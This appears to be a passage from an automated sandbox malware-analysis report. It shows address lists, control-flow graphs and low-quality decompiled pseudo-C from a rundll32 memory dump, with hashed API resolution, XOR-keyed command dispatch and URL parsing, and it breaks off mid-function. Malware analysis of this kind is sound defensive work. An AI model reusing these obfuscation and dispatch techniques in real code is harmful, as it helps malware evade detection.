                          0x1f71cc070eb
                          0x1f71cc070f8
                          0x1f71cc07100
                          0x1f71cc07107
                          0x1f71cc07112
                          0x1f71cc07117
                          0x1f71cc0711e
                          0x1f71cc0712c
                          0x1f71cc0712f
                          0x1f71cc0713d
                          0x1f71cc07145
                          0x1f71cc0714c
                          0x1f71cc07158
                          0x1f71cc0715e
                          0x1f71cc07166
                          0x1f71cc07189
                          0x1f71cc071a5
                          0x1f71cc071b4
                          0x1f71cc071cd
                          0x1f71cc071d5
                          0x1f71cc071dc
                          0x1f71cc071e7
                          0x1f71cc071ef
                          0x1f71cc071f6
                          0x1f71cc0720c
                          0x1f71cc0720f
                          0x1f71cc07214
                          0x1f71cc0721c
                          0x1f71cc07224
                          0x1f71cc0722b
                          0x1f71cc0722d
                          0x1f71cc07234
                          0x1f71cc07257

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.388496424.000001F71CC00000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F71CC00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1f71cc00000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$Free$Alloc$ErrorLast
                          • String ID: uJ$uJ$uJ
                          • API String ID: 1659099196-303439786
                          • Opcode ID: 0009eb8cc0e7ac2dbfe6d5ea119122e533f5930bbc08966e566b1206be97e56d
                          • Instruction ID: ff48d514b2af2dd2a535940e22d06edde436350ea24bc4955b41ed4beedeca0f
                          • Opcode Fuzzy Hash: 0009eb8cc0e7ac2dbfe6d5ea119122e533f5930bbc08966e566b1206be97e56d
                          • Instruction Fuzzy Hash: F8C15F3A21DF8285FA64DFA2A4443FA6790F788B84F5940359E8D437D6DF38C96AC740
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 395 1f71cc05638-1f71cc05687 call 1f71cc0908c 398 1f71cc05689-1f71cc0568c 395->398 399 1f71cc05691-1f71cc056a2 call 1f71cc0908c 395->399 398->399 402 1f71cc056ab-1f71cc056eb call 1f71cc05ba4 call 1f71cc013ec 399->402 403 1f71cc056a4 399->403 408 1f71cc059e0-1f71cc059f9 402->408 409 1f71cc056f1-1f71cc05706 call 1f71cc0908c 402->409 403->402 412 1f71cc05708-1f71cc0570f 409->412 413 1f71cc05711 409->413 414 1f71cc05713-1f71cc05722 call 1f71cc0908c 412->414 413->414 418 1f71cc0572e 414->418 419 1f71cc05724-1f71cc0572c 414->419 420 1f71cc05731-1f71cc05747 HeapAlloc 418->420 419->420 422 1f71cc0574d-1f71cc0576b call 1f71cc047b0 420->422 423 1f71cc059d2-1f71cc059da HeapFree 420->423 426 1f71cc0576d-1f71cc05774 422->426 427 1f71cc057a3-1f71cc057ba call 1f71cc0a238 422->427 423->408 426->427 428 1f71cc05776-1f71cc0579e call 1f71cc047b0 * 2 426->428 433 1f71cc057c0-1f71cc057e1 call 1f71cc0908c 427->433 434 1f71cc059c4-1f71cc059cc HeapFree 427->434 428->427 438 1f71cc057ea 433->438 439 1f71cc057e3-1f71cc057e8 433->439 434->423 440 1f71cc057ec-1f71cc0580b HeapAlloc 438->440 439->440 441 1f71cc05811-1f71cc0584c call 1f71cc05ba4 call 1f71cc013ec 440->441 442 1f71cc059b6 440->442 449 1f71cc059a8-1f71cc059b0 HeapFree 441->449 450 1f71cc05852-1f71cc05893 call 1f71cc0b158 HeapFree 441->450 445 1f71cc059b9-1f71cc059be HeapFree 442->445 445->434 449->442 453 1f71cc05899-1f71cc058a2 450->453 454 1f71cc059fa-1f71cc059ff 450->454 453->454 455 1f71cc058a8-1f71cc058c7 call 1f71cc07cf4 453->455 454->434 455->449 458 1f71cc058cd-1f71cc058ee HeapAlloc 455->458 459 1f71cc059a3 458->459 460 1f71cc058f4-1f71cc05931 call 1f71cc05ba4 call 1f71cc013ec 458->460 459->449 465 1f71cc05933-1f71cc05993 call 1f71cc0b158 * 2 460->465 466 1f71cc05995-1f71cc0599d HeapFree 460->466 465->445 466->459
                          C-Code - Quality: 15%
                          			E000001F71F71CC05638(long long __rbx, long long __rcx, void* __rdx, long long __r8, void* __r11) {
                          				void* __rbp;
                          				signed long long _t89;
                          				signed long long _t109;
                          				signed long long _t122;
                          				signed long long _t131;
                          				intOrPtr _t141;
                          				void* _t167;
                          				void* _t186;
                          				long long* _t187;
                          				long long _t188;
                          				long long _t190;
                          				long long _t192;
                          				long long* _t193;
                          				long long* _t234;
                          				long _t237;
                          				long _t240;
                          				void* _t243;
                          				void* _t248;
                          				void* _t249;
                          				void* _t264;
                          				void* _t269;
                          				void* _t270;
                          				long _t273;
                          				long _t277;
                          				void* _t281;
                          
                          				_t269 = __r11;
                          				_t192 = __rbx;
                          				_t186 = _t248;
                          				 *((long long*)(_t186 + 0x10)) = __rbx;
                          				 *((intOrPtr*)(_t186 + 0x20)) = r9d;
                          				 *((long long*)(_t186 + 0x18)) = __r8;
                          				 *((long long*)(_t186 + 8)) = __rcx;
                          				_t249 = _t248 - 0x50;
                          				_t244 =  *0x1cc0d458;
                          				_t187 =  *0x1cc0d448;
                          				 *((long long*)(_t249 + 0x38)) = _t187;
                          				E000001F71F71CC0908C(0x38e683e4, _t187,  *((intOrPtr*)( *0x1cc0d458 + 0x18)));
                          				if (_t187 == _t237) goto 0x1cc05691;
                          				_t9 = _t237 + 0xa; // 0xa
                          				 *_t187();
                          				E000001F71F71CC0908C(0x9c66d81c, _t187,  *((intOrPtr*)( *0x1cc0d458 + 0x18)));
                          				if (_t187 == _t237) goto 0x1cc056ab;
                          				 *_t187();
                          				_t12 = _t249 + 0x30; // -126
                          				_t89 = E000001F71F71CC05BA4(_t12);
                          				_t13 = _t249 + 0x30; // -126
                          				r11d = _t89;
                          				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
                          				_t18 = _t269 + 3; // 0x3
                          				E000001F71F71CC013EC(_t18, _t187, __rbx, _t13);
                          				 *((long long*)(_t249 + 0x40)) = _t187;
                          				if (_t187 == _t237) goto 0x1cc059e0;
                          				r12d = 0xfb849f8f;
                          				E000001F71F71CC0908C(r12d, _t187,  *((intOrPtr*)( *0x1cc0d458 + 0x18)));
                          				if (_t187 == _t237) goto 0x1cc05711;
                          				 *_t187();
                          				goto 0x1cc05713;
                          				E000001F71F71CC0908C(r12d, _t187,  *((intOrPtr*)(_t244 + 0x18)));
                          				if (_t187 == _t237) goto 0x1cc0572e;
                          				r13d =  *_t187();
                          				goto 0x1cc05731;
                          				r13d = 0;
                          				_t23 = _t192 + 7; // 0x7
                          				r8d = _t273 + _t23;
                          				HeapAlloc(_t281, _t277, _t273);
                          				if (_t187 == _t237) goto 0x1cc059d2;
                          				_t24 = _t192 + 1; // 0x1
                          				r8d = _t24;
                          				0x1cc047b0();
                          				if ( *((intOrPtr*)(_t249 + 0xa0)) == _t237) goto 0x1cc057a3;
                          				if ( *((intOrPtr*)(_t249 + 0xa8)) == 0) goto 0x1cc057a3;
                          				_t188 =  *((intOrPtr*)(_t249 + 0x38));
                          				r8d = 6;
                          				0x1cc047b0();
                          				_t32 = _t273 + 1; // 0x1
                          				r8d = _t32;
                          				0x1cc047b0();
                          				_t234 = _t187;
                          				if (E000001F71F71CC0A238(_t9, 0, _t167,  *((intOrPtr*)(_t249 + 0xa8)), _t192,  *((intOrPtr*)(_t249 + 0x90)), _t234, _t249 + 0x48, _t264) != 0) goto 0x1cc059c4;
                          				_t193 =  *((intOrPtr*)(_t249 + 0xb0));
                          				 *_t193 =  *((intOrPtr*)(_t249 + 0x48));
                          				E000001F71F71CC0908C(0xfb849f8f, _t188,  *((intOrPtr*)(_t244 + 0x18)));
                          				if (_t188 == _t237) goto 0x1cc057ea;
                          				 *_t188();
                          				goto 0x1cc057ec;
                          				 *((intOrPtr*)(_t193 + 0x10)) = 0;
                          				_t41 = _t234 + 0x34; // 0x34
                          				r8d = _t41;
                          				 *((intOrPtr*)(_t193 + 0x14)) = 1;
                          				HeapAlloc(_t270, _t237, _t240);
                          				if (_t188 == _t237) goto 0x1cc059b6;
                          				_t43 = _t249 + 0x30; // 0xfb849fcf
                          				_t109 = E000001F71F71CC05BA4(_t43);
                          				_t44 = _t249 + 0x30; // 0xfb849fcf
                          				r11d = _t109;
                          				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
                          				_t49 = _t269 + 3; // 0x3
                          				E000001F71F71CC013EC(_t49, _t188, _t193, _t44);
                          				if (_t188 == _t237) goto 0x1cc059a8;
                          				0x1cc0b158();
                          				HeapFree(_t243, ??);
                          				 *((long long*)(_t193 + 8)) = _t188;
                          				if ( *((intOrPtr*)(_t249 + 0xa0)) == _t237) goto 0x1cc059fa;
                          				_t141 =  *((intOrPtr*)(_t249 + 0xa8));
                          				if (_t141 == 0) goto 0x1cc059fa;
                          				r8d = _t141;
                          				_t190 = _t193 + 0x28;
                          				 *((long long*)(_t249 + 0x20)) = _t190;
                          				if (E000001F71F71CC07CF4(_t190, _t193,  *((intOrPtr*)(_t249 + 0x90)),  *((intOrPtr*)(_t249 + 0xa0)), _t188, _t193 + 0x18) != 0) goto 0x1cc059a8;
                          				r15d = 0x77;
                          				 *((intOrPtr*)(_t193 + 0x2c)) = 1;
                          				HeapAlloc(??, ??, ??);
                          				if (_t190 == _t237) goto 0x1cc059a3;
                          				_t62 = _t249 + 0x30; // 0xfb849fcf
                          				_t122 = E000001F71F71CC05BA4(_t62);
                          				_t63 = _t249 + 0x30; // 0xfb849fcf
                          				r11d = _t122;
                          				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
                          				_t68 = _t269 + 3; // 0x3
                          				_t131 = E000001F71F71CC013EC(_t68, _t190, _t193, _t63);
                          				 *((long long*)(_t249 + 0x48)) = _t190;
                          				if (_t190 == _t237) goto 0x1cc05995;
                          				0x1cc0b158();
                          				r11d = _t131;
                          				r15d = r15d - r11d;
                          				 *((long long*)(_t249 + 0x20)) =  *((intOrPtr*)(_t249 + 0x38)) + 0x1f71cc1129f;
                          				0x1cc0b158();
                          				 *((long long*)(_t193 + 0x20)) = _t190;
                          				goto 0x1cc059b9;
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				return 2;
                          			}




























                          0x1f71cc05638
                          0x1f71cc05638
                          0x1f71cc05638
                          0x1f71cc0563b
                          0x1f71cc0563f
                          0x1f71cc05643
                          0x1f71cc05647
                          0x1f71cc05656
                          0x1f71cc0565a
                          0x1f71cc05661
                          0x1f71cc05678
                          0x1f71cc0567f
                          0x1f71cc05687
                          0x1f71cc0568c
                          0x1f71cc0568f
                          0x1f71cc0569a
                          0x1f71cc056a2
                          0x1f71cc056a9
                          0x1f71cc056ab
                          0x1f71cc056b0
                          0x1f71cc056b5
                          0x1f71cc056ba
                          0x1f71cc056d4
                          0x1f71cc056d7
                          0x1f71cc056db
                          0x1f71cc056e3
                          0x1f71cc056eb
                          0x1f71cc056f5
                          0x1f71cc056fe
                          0x1f71cc05706
                          0x1f71cc0570b
                          0x1f71cc0570f
                          0x1f71cc0571a
                          0x1f71cc05722
                          0x1f71cc05729
                          0x1f71cc0572c
                          0x1f71cc0572e
                          0x1f71cc05731
                          0x1f71cc05731
                          0x1f71cc0573b
                          0x1f71cc05747
                          0x1f71cc0574d
                          0x1f71cc0574d
                          0x1f71cc05757
                          0x1f71cc0576b
                          0x1f71cc05774
                          0x1f71cc05776
                          0x1f71cc0577b
                          0x1f71cc0578d
                          0x1f71cc05792
                          0x1f71cc05792
                          0x1f71cc0579e
                          0x1f71cc057b0
                          0x1f71cc057ba
                          0x1f71cc057c0
                          0x1f71cc057d2
                          0x1f71cc057d9
                          0x1f71cc057e1
                          0x1f71cc057e6
                          0x1f71cc057e8
                          0x1f71cc057f1
                          0x1f71cc057f4
                          0x1f71cc057f4
                          0x1f71cc057f8
                          0x1f71cc057ff
                          0x1f71cc0580b
                          0x1f71cc05811
                          0x1f71cc05816
                          0x1f71cc0581b
                          0x1f71cc05820
                          0x1f71cc0583a
                          0x1f71cc0583d
                          0x1f71cc05841
                          0x1f71cc0584c
                          0x1f71cc05871
                          0x1f71cc0587e
                          0x1f71cc0588c
                          0x1f71cc05893
                          0x1f71cc05899
                          0x1f71cc058a2
                          0x1f71cc058a8
                          0x1f71cc058b3
                          0x1f71cc058bb
                          0x1f71cc058c7
                          0x1f71cc058cd
                          0x1f71cc058db
                          0x1f71cc058e2
                          0x1f71cc058ee
                          0x1f71cc058f4
                          0x1f71cc058f9
                          0x1f71cc058fe
                          0x1f71cc05903
                          0x1f71cc0591d
                          0x1f71cc05920
                          0x1f71cc05924
                          0x1f71cc05929
                          0x1f71cc05931
                          0x1f71cc05950
                          0x1f71cc0595d
                          0x1f71cc05968
                          0x1f71cc05970
                          0x1f71cc05980
                          0x1f71cc0598a
                          0x1f71cc05993
                          0x1f71cc0599d
                          0x1f71cc059b0
                          0x1f71cc059be
                          0x1f71cc059cc
                          0x1f71cc059da
                          0x1f71cc059f9

                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.388496424.000001F71CC00000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F71CC00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1f71cc00000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$Free$Alloc$ErrorLast
                          • String ID:
                          • API String ID: 1659099196-0
                          • Opcode ID: 8a526f4b4f4539653de5a656a5e2567e36e45d16e14d605094fa57f0b70ba07b
                          • Instruction ID: 32b748a4fa679a01ebe41dea2e8bb134269773b4bd20b8cad3eb7e7f0c5f2a19
                          • Opcode Fuzzy Hash: 8a526f4b4f4539653de5a656a5e2567e36e45d16e14d605094fa57f0b70ba07b
                          • Instruction Fuzzy Hash: 49A1923931CE8286FB14DFA6D5002EA67A1F7C9BC4F444521AE4E87B95DE38CD6AC740
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 542 1f71cc07fd4-1f71cc08011 543 1f71cc08017-1f71cc0801c 542->543 544 1f71cc080ef-1f71cc080f6 542->544 547 1f71cc08022-1f71cc08027 543->547 548 1f71cc08115-1f71cc08118 543->548 545 1f71cc080f8-1f71cc08109 call 1f71cc0908c 544->545 546 1f71cc0814a 544->546 566 1f71cc08139 545->566 567 1f71cc0810b-1f71cc08113 545->567 549 1f71cc0814f-1f71cc08152 546->549 551 1f71cc080e9 547->551 552 1f71cc0802d-1f71cc08032 547->552 553 1f71cc0811a-1f71cc0811d 548->553 554 1f71cc080bf-1f71cc080c4 548->554 555 1f71cc08158-1f71cc0815e 549->555 556 1f71cc0821b-1f71cc08224 549->556 551->544 558 1f71cc081c8-1f71cc081cf 552->558 559 1f71cc08038-1f71cc0803d 552->559 560 1f71cc08120 call 1f71cc085cc 553->560 554->556 555->556 562 1f71cc08164-1f71cc0816c 555->562 568 1f71cc08241-1f71cc0825b 556->568 569 1f71cc08226-1f71cc0822c 556->569 564 1f71cc081fb 558->564 565 1f71cc081d1-1f71cc081f9 call 1f71cc02874 HeapFree 558->565 561 1f71cc08043-1f71cc08048 559->561 559->562 563 1f71cc08125-1f71cc0812b 560->563 570 1f71cc080c9-1f71cc080da call 1f71cc0908c 561->570 571 1f71cc0804a-1f71cc0804f 561->571 576 1f71cc081be-1f71cc081c6 562->576 577 1f71cc0816e-1f71cc08171 562->577 572 1f71cc0812d-1f71cc08134 563->572 573 1f71cc080b5-1f71cc080ba 563->573 578 1f71cc08200-1f71cc08203 564->578 565->578 574 1f71cc0813e-1f71cc08148 566->574 567->574 569->568 579 1f71cc0822e-1f71cc08239 569->579 594 1f71cc080dc 570->594 595 1f71cc080e2-1f71cc080e4 570->595 582 1f71cc0805b-1f71cc0805e 571->582 583 1f71cc08051-1f71cc08056 571->583 584 1f71cc0807a-1f71cc0808a 572->584 573->556 574->549 576->556 576->558 577->576 586 1f71cc08173-1f71cc0818f call 1f71cc0487a 577->586 578->556 587 1f71cc08205-1f71cc08212 578->587 581 1f71cc0823c call 1f71cc06ac0 579->581 581->568 582->554 590 1f71cc08060-1f71cc08063 582->590 583->556 591 1f71cc0808d call 1f71cc014b8 584->591 603 1f71cc08192 call 1f71cc05448 586->603 593 1f71cc08214 call 1f71cc09214 587->593 596 1f71cc08066 call 1f71cc085cc 590->596 597 1f71cc08092-1f71cc08096 591->597 599 1f71cc08219 593->599 594->595 595->556 600 1f71cc0806b-1f71cc08071 596->600 601 1f71cc08098-1f71cc0809d 597->601 602 1f71cc080a2-1f71cc080b0 HeapFree 597->602 599->556 600->573 604 1f71cc08073 600->604 601->556 602->556 605 1f71cc08197-1f71cc08199 603->605 604->584 606 1f71cc0819b-1f71cc081ac call 1f71cc0672c 605->606 607 1f71cc081bc 605->607 606->576 610 1f71cc081ae-1f71cc081b7 606->610 607->576 610->607
                          C-Code - Quality: 38%
                          			E000001F71F71CC07FD4(signed int __edx, char* __rax, long long __rbx, void* __rcx, long long __rsi, void* __r8) {
                          				void* __rdi;
                          				signed int _t34;
                          				void* _t66;
                          				char* _t104;
                          				void* _t131;
                          				char* _t134;
                          				long long _t140;
                          				void* _t141;
                          				void* _t143;
                          				void* _t144;
                          				signed long long _t156;
                          				void* _t158;
                          
                          				_t106 = __rbx;
                          				_t104 = __rax;
                          				 *((long long*)(_t143 + 8)) = __rbx;
                          				 *((long long*)(_t143 + 0x18)) = _t140;
                          				 *((long long*)(_t143 + 0x20)) = __rsi;
                          				_t144 = _t143 - 0x40;
                          				r14d =  *0x1cc0d450;
                          				_t141 = __rcx;
                          				_t137 =  *((intOrPtr*)( *0x1cc0d458 + 8));
                          				r12d = 0;
                          				_t34 = r14d ^ __edx;
                          				if (_t34 == 0x139d2b8d) goto 0x1cc080ef;
                          				if (_t34 == 0x15f5a8c2) goto 0x1cc08115;
                          				if (_t34 == 0x2f77acf9) goto 0x1cc080e9;
                          				if (_t34 == 0x48e12436) goto 0x1cc081c8;
                          				if (_t34 == 0x4d382929) goto 0x1cc08164;
                          				if (_t34 == 0xb016dc39) goto 0x1cc080c9;
                          				if (_t34 == 0xb057dfc9) goto 0x1cc0805b;
                          				goto 0x1cc0821b;
                          				if (r9d == 0) goto 0x1cc080bf;
                          				E000001F71F71CC085CC(r9d, __rbx, __r8,  *((intOrPtr*)( *0x1cc0d458 + 8)), _t158);
                          				if (_t104 == 0) goto 0x1cc080b5;
                          				 *(_t144 + 0x20) =  *(_t144 + 0x20) & _t156;
                          				if (E000001F71F71CC014B8(_t104, _t106, _t141, 0x1f71cc034a4,  *((intOrPtr*)( *0x1cc0d458 + 8)), _t104,  *((intOrPtr*)(_t144 + 0x80))) != 0) goto 0x1cc080a2;
                          				goto 0x1cc0821b;
                          				HeapFree(_t131, ??);
                          				goto 0x1cc0821b;
                          				goto 0x1cc0821b;
                          				goto 0x1cc0821b;
                          				E000001F71F71CC0908C(0xd97160e4, _t104,  *((intOrPtr*)( *((intOrPtr*)( *0x1cc0d458 + 8)) + 0x18)));
                          				if (_t104 == 0) goto 0x1cc080e2;
                          				 *_t104();
                          				goto 0x1cc0821b;
                          				r12d = 1;
                          				if ( *(_t141 + 0x50) == 0) goto 0x1cc0814a;
                          				E000001F71F71CC0908C(0xf2d20ec6, _t104,  *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x28)) + 0x18)));
                          				if (_t104 == 0) goto 0x1cc08139;
                          				 *_t104();
                          				goto 0x1cc0813e;
                          				if (r9d == 0) goto 0x1cc080bf;
                          				E000001F71F71CC085CC(r9d,  *(_t141 + 0x50), _t104,  *((intOrPtr*)( *0x1cc0d458 + 8)), _t156);
                          				_t134 = _t104;
                          				if (_t104 == 0) goto 0x1cc080b5;
                          				goto 0x1cc0807a;
                          				asm("sbb ebx, ebx");
                          				goto 0x1cc0814f;
                          				if (r12d == 0) goto 0x1cc0821b;
                          				if (0x426 != 0x426) goto 0x1cc0821b;
                          				if (_t134 == 0) goto 0x1cc081be;
                          				if ( *_t134 == 0) goto 0x1cc081be;
                          				0x1cc0487a();
                          				if (E000001F71F71CC05448(_t104,  *(_t141 + 0x50), _t134, _t144 + 0x30, _t137, _t141) != 0) goto 0x1cc081bc;
                          				if (E000001F71F71CC0672C(_t134, _t144 + 0x30, _t144 + 0x68) == 0) goto 0x1cc081be;
                          				asm("ror ax, 0x8");
                          				 *((short*)(_t144 + 0x32)) =  *(_t144 + 0x68) & 0x0000ffff;
                          				r12d = 1;
                          				if (0 != 0) goto 0x1cc0821b;
                          				if ( *(_t141 + 0x50) == 0) goto 0x1cc081fb;
                          				 *(_t141 + 0x50) =  *(_t141 + 0x50) & 0x00000000;
                          				E000001F71F71CC02874( *((intOrPtr*)( *0x1cc0d458 + 8)),  *(_t141 + 0x50), _t134,  *(_t141 + 0x50));
                          				HeapFree(??, ??, ??);
                          				goto 0x1cc08200;
                          				if (r12d == 0) goto 0x1cc0821b;
                          				_t27 = _t144 + 0x30; // 0x31
                          				_t66 = E000001F71F71CC09214( *((intOrPtr*)( *0x1cc0d458 + 8)), _t27, _t134,  *(_t141 + 0x50), _t141,  *((intOrPtr*)(_t141 + 0x38)), _t141 + 0x50);
                          				if ( *((long long*)(_t144 + 0x80)) == 0) goto 0x1cc08241;
                          				if (_t66 == 0x3e5) goto 0x1cc08241;
                          				r8d = _t66;
                          				E000001F71F71CC06AC0( *0x1cc0d458,  *((intOrPtr*)( *0x1cc0d458 + 8)), _t141,  *((intOrPtr*)(_t144 + 0x80)),  *(_t141 + 0x50), _t141);
                          				return _t66;
                          			}















                          0x1f71cc07fd4
                          0x1f71cc07fd4
                          0x1f71cc07fd4
                          0x1f71cc07fd9
                          0x1f71cc07fde
                          0x1f71cc07fe8
                          0x1f71cc07fec
                          0x1f71cc07ff3
                          0x1f71cc07ffd
                          0x1f71cc08004
                          0x1f71cc08007
                          0x1f71cc08011
                          0x1f71cc0801c
                          0x1f71cc08027
                          0x1f71cc08032
                          0x1f71cc0803d
                          0x1f71cc08048
                          0x1f71cc0804f
                          0x1f71cc08056
                          0x1f71cc0805e
                          0x1f71cc08066
                          0x1f71cc08071
                          0x1f71cc08082
                          0x1f71cc08096
                          0x1f71cc0809d
                          0x1f71cc080aa
                          0x1f71cc080b0
                          0x1f71cc080ba
                          0x1f71cc080c4
                          0x1f71cc080d2
                          0x1f71cc080da
                          0x1f71cc080e0
                          0x1f71cc080e4
                          0x1f71cc080e9
                          0x1f71cc080f6
                          0x1f71cc08101
                          0x1f71cc08109
                          0x1f71cc08111
                          0x1f71cc08113
                          0x1f71cc08118
                          0x1f71cc08120
                          0x1f71cc08125
                          0x1f71cc0812b
                          0x1f71cc08134
                          0x1f71cc08140
                          0x1f71cc08148
                          0x1f71cc08152
                          0x1f71cc0815e
                          0x1f71cc0816c
                          0x1f71cc08171
                          0x1f71cc08185
                          0x1f71cc08199
                          0x1f71cc081ac
                          0x1f71cc081b3
                          0x1f71cc081b7
                          0x1f71cc081be
                          0x1f71cc081c6
                          0x1f71cc081cf
                          0x1f71cc081d1
                          0x1f71cc081e4
                          0x1f71cc081f1
                          0x1f71cc081f9
                          0x1f71cc08203
                          0x1f71cc0820d
                          0x1f71cc08219
                          0x1f71cc08224
                          0x1f71cc0822c
                          0x1f71cc08236
                          0x1f71cc0823c
                          0x1f71cc0825b

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.388496424.000001F71CC00000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F71CC00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1f71cc00000_rundll32.jbxd
                          Similarity
                          • API ID: FreeHeap
                          • String ID: ))8M$6$H$lJu
                          • API String ID: 3298025750-2816507560
                          • Opcode ID: e943009c52edc3a9ff9218d50e7176983ae45fe1d98091206747ec6dadb96f7e
                          • Instruction ID: 677d6747b515d8236492b1cd226e7603baf5b8af6db49e835104102d1ce2ee31
                          • Opcode Fuzzy Hash: e943009c52edc3a9ff9218d50e7176983ae45fe1d98091206747ec6dadb96f7e
                          • Instruction Fuzzy Hash: 5461633920CF8385FB649FE694803FB52A1BB94B94F588035DE49877D6DE68CC6E8701
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 471 1f71cc01bfc-1f71cc01c41 472 1f71cc01c4a-1f71cc01c5b call 1f71cc0908c 471->472 473 1f71cc01c43-1f71cc01c45 call 1f71cc047b8 471->473 477 1f71cc01c5d 472->477 478 1f71cc01c63-1f71cc01c6d 472->478 473->472 477->478 479 1f71cc01cdd-1f71cc01ce4 478->479 480 1f71cc01c6f-1f71cc01c80 478->480 481 1f71cc01ceb-1f71cc01cfc call 1f71cc0908c 479->481 482 1f71cc01c82-1f71cc01c85 480->482 483 1f71cc01c94 480->483 492 1f71cc01d09-1f71cc01d0c 481->492 493 1f71cc01cfe-1f71cc01d03 481->493 485 1f71cc01c87-1f71cc01c8e 482->485 486 1f71cc01c90-1f71cc01c92 482->486 487 1f71cc01c97-1f71cc01c9a 483->487 485->482 485->486 486->483 486->487 489 1f71cc01c9c-1f71cc01ca0 487->489 490 1f71cc01caf-1f71cc01cb4 487->490 489->490 494 1f71cc01ca2-1f71cc01ca6 489->494 491 1f71cc01cb6 call 1f71cc0240c 490->491 495 1f71cc01cbb-1f71cc01cc1 491->495 496 1f71cc01ed1 492->496 497 1f71cc01d12-1f71cc01d3c 492->497 493->492 494->490 498 1f71cc01ca8-1f71cc01cac 494->498 495->479 499 1f71cc01cc3-1f71cc01cdb 495->499 500 1f71cc01ed6-1f71cc01eef 496->500 501 1f71cc01d40 call 1f71cc05168 497->501 498->490 499->481 502 1f71cc01d45-1f71cc01d49 501->502 503 1f71cc01d4f-1f71cc01d6f call 1f71cc0908c 502->503 504 1f71cc01ec1-1f71cc01ecf HeapFree 502->504 507 1f71cc01d77-1f71cc01d7e 503->507 508 1f71cc01d71 503->508 504->500 509 1f71cc01d8c 507->509 510 1f71cc01d80 507->510 508->507 512 1f71cc01d94-1f71cc01da5 call 1f71cc0908c 509->512 511 1f71cc01d82 call 1f71cc0240c 510->511 513 1f71cc01d87-1f71cc01d8a 511->513 516 1f71cc01da7 512->516 517 1f71cc01dad-1f71cc01db0 512->517 513->512 516->517 518 1f71cc01ea1-1f71cc01ebb HeapFree * 2 517->518 519 1f71cc01db6-1f71cc01dc9 call 1f71cc0908c 517->519 518->504 522 1f71cc01dcb-1f71cc01dd3 519->522 523 1f71cc01dd5 519->523 524 1f71cc01dd8-1f71cc01deb call 1f71cc0908c 522->524 523->524 528 1f71cc01df7 524->528 529 1f71cc01ded-1f71cc01df5 524->529 530 1f71cc01dfa-1f71cc01dff 528->530 529->530 532 1f71cc01e02 call 1f71cc0240c 530->532 533 1f71cc01e07-1f71cc01e0d 532->533 534 1f71cc01e93-1f71cc01e9b HeapFree 533->534 535 1f71cc01e13-1f71cc01e7c call 1f71cc047b0 call 1f71cc06518 533->535 534->518 540 1f71cc01e7e-1f71cc01e83 535->540 541 1f71cc01e85-1f71cc01e8d HeapFree 535->541 540->541 541->534
                          C-Code - Quality: 17%
                          			E000001F71F71CC01BFC(long long* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, intOrPtr _a8, long long _a16, long long _a24, long long _a40, long long _a48) {
                          				long long _v72;
                          				char _v80;
                          				char _v88;
                          				long long _v96;
                          				char _v104;
                          				signed int _v112;
                          				long long _v120;
                          				long long _v128;
                          				intOrPtr _v136;
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				signed int _t65;
                          				intOrPtr _t93;
                          				intOrPtr _t94;
                          				long long* _t148;
                          				long long* _t152;
                          				long long* _t155;
                          				long long* _t157;
                          				intOrPtr* _t188;
                          				intOrPtr _t189;
                          				long long _t192;
                          				long long* _t193;
                          				void* _t203;
                          				intOrPtr _t213;
                          				long long _t214;
                          
                          				_t157 = __rbx;
                          				_t148 = __rax;
                          				_a24 = __rbx;
                          				_a16 = __rdx;
                          				_t214 =  *0x1cc0d458;
                          				_t192 =  *((intOrPtr*)(__rcx));
                          				r13d = r8d;
                          				_t193 = __rcx;
                          				_v72 = _t214;
                          				_v96 = _t192;
                          				if ( *((intOrPtr*)(__rcx + 0x70)) -  *((intOrPtr*)(__rcx + 0x50)) < 0) goto 0x1cc01c4a;
                          				E000001F71F71CC047B8(0, __rax, __rbx, __rcx, __rdx);
                          				E000001F71F71CC0908C(0x4a75e5e7, __rax,  *((intOrPtr*)(_t214 + 0x10)));
                          				if (_t148 == _t157) goto 0x1cc01c63;
                          				_t9 = _t192 + 0x18; // 0x18
                          				 *_t148();
                          				_t65 =  *(_t193 + 0x50) & 0x000000ff;
                          				if (( *(_t193 + 0x70) & 0x000000ff) - _t65 >= 0) goto 0x1cc01cdd;
                          				_t188 =  *((intOrPtr*)( *((intOrPtr*)(_t193 + 0x48)) + _t9 * 8));
                          				_t93 =  *_t188;
                          				if (_t93 == 0) goto 0x1cc01c94;
                          				if (_t93 == 0x2f) goto 0x1cc01c90;
                          				_t94 =  *((intOrPtr*)(_t188 + 1));
                          				if (_t94 != 0) goto 0x1cc01c82;
                          				if (_t94 != 0) goto 0x1cc01c97;
                          				_t152 = _t157;
                          				if (_t152 == _t157) goto 0x1cc01caf;
                          				if ( *((char*)(_t152 - 1)) != 0x3a) goto 0x1cc01caf;
                          				if ( *((char*)(_t152 + 1)) != 0x2f) goto 0x1cc01caf;
